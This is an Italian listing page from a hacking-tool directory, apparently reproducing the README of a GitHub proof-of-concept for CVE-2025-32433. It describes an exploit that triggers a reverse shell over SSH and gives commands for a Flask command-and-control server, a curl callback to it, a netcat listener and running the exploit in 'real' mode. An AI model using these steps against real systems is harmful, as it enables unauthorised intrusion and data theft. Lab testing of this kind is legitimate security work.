Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC_CVE-2025-32433 — Proof-of-concept exploit per CVE-2025-32433 con modalità di attacco simulate e reali, incluso un server C2 basato su Flask per callback di reverse shell e simulazione di post-exploitation. | Kitploit
Strumenti/GitHubGitHub/ekomssavior/poc_cve-2025-32433
Analisi delle VulnerabilitàExploitPenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubekomssavior/poc_cve-2025-32433

POC_CVE-2025-32433

Proof-of-concept exploit per CVE-2025-32433 con modalità di attacco simulate e reali, incluso un server C2 basato su Flask per callback di reverse shell e simulazione di post-exploitation.

Vedi Repository
5271 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

⚠️ Dichiarazione Etica

Questo repository contiene codice che dimostra una vera CVE (CVE-2025-32433).
Usalo solo in ambienti in cui hai esplicita autorizzazione.

Non testare mai questo exploit contro sistemi che non possiedi o gestisci.
L'uso non autorizzato è illegale, non etico e dannoso per la comunità della cybersecurity.

POC simulato e reale per CVE-2025-32433

Il mio amico Chocapikk mi ha mostrato questo PoC trovato erling_cve.py, ero incuriosito e volevo testarlo in un ambiente sicuro.

Hai due scelte con questo repo. Lo script simulato sicuro e il sistema che descrivo di seguito.

Oppure puoi utilizzare il vero erling_cve.py (in modo etico, con cautela e solo su reti su cui hai il permesso di testare)

Prima di usare questo strumento per testare o eseguire un exploit reale, dai un'occhiata al mio amico m0usemm0use e al suo script Python per trovare target vulnerabili a CVE-2025-32433!!!!

https://github.com/m0usem0use/erl_mouse


Versione SIMULATA dell'exploit per CVE-2025-32433

Configura il Server C2

Costruisci un C2 basato su Python Flask: potente per callback di bot o reverse shell.

Esegui questo script di configurazione sul server C2

apt update && apt install python3-pip git -y

sudo apt install python3-flask

mkdir ~/c2

cd ~/c2

nano c2_server.py (incolla lo script c2_server, modifica se necessario)

esegui

python3 c2_server.py

I bot (o gli script di test) possono eseguire curl verso home in questo modo

curl -X POST http://:8080/report -d "Bot is online"

Configura l'ambiente Python venv su Kali

mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab

Crea un ambiente virtuale Python

python3 -m venv venv

source venv/bin/activate

sudo apt install python3-requests

Test del Callback

nano test_callback.py (incolla lo script test_callback e modifica se necessario)

esegui il callback

python3 test_callback.py

Ora hai ufficialmente

Un venv funzionante

Un C2 cloud live

Un'iniezione di callback funzionale

  • Hai bisogno che la macchina target/vittima abbia un processo o servizio Erlang esposto (o simulato)

COSA FA erling_cve.py?

Si connette alla porta 22 di un IP target

Invia una stringa di versione SSH falsa

Invia un pacchetto costruito (probabilmente per attivare una vulnerabilità — fingendo di abusare di qualcosa come il gestore SSH non documentato di Erlang o un buffer overflow)

Attiva una reverse shell verso l'IP dell'attaccante

Simula post-exploitation eseguendo comandi come whoami, uname e una finta "esfiltrazione di credenziali" verso /tmp/exfil.log

Prenderemo il nostro PoC simile a Erlang e lo

Renderemo funzionante all'interno del venv di Kali

Lo collegheremo per segnalare al nostro C2 cloud quando l'"attacco" viene eseguito

Lo eseguiremo in modo etico e sicuro all'interno di un laboratorio controllato

Lo osserveremo generare /tmp/exfil.log per simulare dati rubati


dalla macchina Kali

nano poc_erlang_test.py

-incolla poc_erlang_test.py e modifica se necessario

Apri un Listener

in un nuovo terminale esegui

nc -lvnp 4444

esegui il PoC

python poc_erlang_test.py --real

Scarica lo strumento